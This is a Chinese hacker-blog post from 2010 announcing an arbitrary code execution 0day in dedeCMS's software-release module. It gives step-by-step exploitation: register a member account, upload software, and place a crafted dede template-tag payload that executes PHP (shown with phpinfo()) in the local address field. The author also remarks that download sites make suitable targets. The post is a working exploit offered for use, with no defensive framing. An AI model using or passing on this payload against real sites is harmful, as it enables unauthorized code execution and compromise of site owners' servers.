蓝盟诗人[LUC]蓝客联盟

设为首页
加入收藏
订阅本站
热门搜索:WordPress 插件 Win7 技巧 PHP SEO 主题 漏洞仓库 漏洞 dedeCMS DNF webshell 脚本 数据库 SESSION
您的位置: 首页 > 黑客 > 漏洞仓库 > 正文

dedeCMS软件发布模块任意代码执行漏洞0day

2010-09-26 22:31 作者: 来源: 本站 浏览: 2,020 views 我要评论 字号:

说下利用方法:注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="'']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行。

漏洞鸡肋之处在于经历上次的0day冲击后,很多站点已经关闭了会员功能或者直接删除了member目录,并且没有多少站会有软件栏目的,嗯 ,所以搞搞 下载站之类的差不多了。

标签: ,
本文链接: dedeCMS软件发布模块任意代码执行漏洞0day
版权所有: 非特殊声明均为本站原创文章,转载请注明出处:诗人博客 www.BlueNoob.com | 蓝色菜鸟网
订阅更新: 您可以通过RSS订阅我们的内容更新

扫描二维码手机访问

dedeCMS软件发布模块任意代码执行漏洞0day

相关阅读

随机推荐

打印
分享到:
复制链接

发表评论

*

* (保密)


申请头像

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.

Copyright © 2010-2020 诗人博客 www.BlueNoob.com | 蓝色菜鸟网 All Rights Reserved.

百度Sitemap Google Sitemap

103 | 0.4784260